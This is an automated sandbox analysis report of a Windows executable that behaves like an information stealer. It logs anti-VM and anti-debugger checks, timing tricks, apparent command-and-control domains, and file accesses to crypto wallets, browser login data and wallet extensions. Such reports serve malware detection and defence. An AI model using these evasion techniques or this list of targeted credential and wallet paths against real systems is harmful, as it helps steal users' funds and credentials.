                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0D16 second address: 48D0D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [770E459Ch], 05h 0x00000010 pushad 0x00000011 call 00007F0668FAD1FCh 0x00000016 jmp 00007F0668FAD202h 0x0000001b pop eax 0x0000001c mov esi, ebx 0x0000001e popad 0x0000001f je 00007F06DB75AE98h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0D69 second address: 48D0D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0D6D second address: 48D0D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0E57 second address: 48D0E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0E5B second address: 48D0E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0E5F second address: 48D0E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0E65 second address: 48D0EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0668FAD202h 0x00000009 jmp 00007F0668FAD205h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 sub esi, esi 0x00000016 jmp 00007F0668FAD1FDh 0x0000001b mov dword ptr [ebp-1Ch], esi 0x0000001e pushad 0x0000001f mov si, ABC3h 0x00000023 push eax 0x00000024 push edx 0x00000025 mov al, 72h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0C55 second address: 48E0C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06687C5EF7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0C76 second address: 48E0C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e mov si, 7575h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0C8A second address: 48E0C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov bx, ax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0C94 second address: 48E0CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0668FAD205h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0CB1 second address: 48E0D78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007F06687C5EF3h 0x0000000b or esi, 5774E5BEh 0x00000011 jmp 00007F06687C5EF9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b jmp 00007F06687C5EEEh 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 push eax 0x00000025 call 00007F06687C5EEDh 0x0000002a pop ecx 0x0000002b pop ebx 0x0000002c mov ecx, 0CC7AF3Dh 0x00000031 popad 0x00000032 test esi, esi 0x00000034 jmp 00007F06687C5EF8h 0x00000039 je 00007F06DAF6356Dh 0x0000003f pushad 0x00000040 mov edi, esi 0x00000042 mov edx, ecx 0x00000044 popad 0x00000045 cmp dword ptr [770E459Ch], 05h 0x0000004c pushad 0x0000004d pushad 0x0000004e push eax 0x0000004f pop ebx 0x00000050 mov bx, cx 0x00000053 popad 0x00000054 jmp 00007F06687C5EF8h 0x00000059 popad 0x0000005a je 00007F06DAF7B619h 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F06687C5EEAh 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0D78 second address: 48E0D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0D7E second address: 48E0D84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0D84 second address: 48E0D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0D88 second address: 48E0DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F06687C5EEAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0DB5 second address: 48E0DBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0DBB second address: 48E0DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06687C5EECh 0x00000009 sub ax, F1C8h 0x0000000e jmp 00007F06687C5EEBh 0x00000013 popfd 0x00000014 mov ch, EBh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0DE8 second address: 48E0DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0DEC second address: 48E0DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSpecial instruction interceptor: First address: 467EC2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSpecial instruction interceptor: First address: 467F80 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSpecial instruction interceptor: First address: 638BA4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSpecial instruction interceptor: First address: 620881 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSpecial instruction interceptor: First address: 69FC71 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exe TID: 7780Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exe TID: 7772Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exe TID: 7924Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exe TID: 7784Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\mG83m82qhF.exeLast function: Thread delayed
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556926556.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1456839533.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: mG83m82qhF.exe, 00000000.00000002.2004291440.00000000005EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: mG83m82qhF.exe, 00000000.00000002.2004291440.00000000005EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: mG83m82qhF.exe, 00000000.00000003.1401452781.00000000052AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\mG83m82qhF.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\mG83m82qhF.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\mG83m82qhF.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\mG83m82qhF.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\mG83m82qhF.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\mG83m82qhF.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\mG83m82qhF.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\mG83m82qhF.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: SICE
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: mG83m82qhF.exe, 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: steppriflej.xyz
                Source: mG83m82qhF.exe, 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sendypaster.xyz
                Source: mG83m82qhF.exe, 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: cuddlyready.xyz
                Source: mG83m82qhF.exe, 00000000.00000002.2004579010.0000000000636000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: p+Program Manager
                Source: C:\Users\user\Desktop\mG83m82qhF.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\mG83m82qhF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: mG83m82qhF.exe PID: 7704, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: mG83m82qhF.exeString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: mG83m82qhF.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: mG83m82qhF.exeString found in binary or memory: Wallets/Exodus
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: mG83m82qhF.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: mG83m82qhF.exeString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
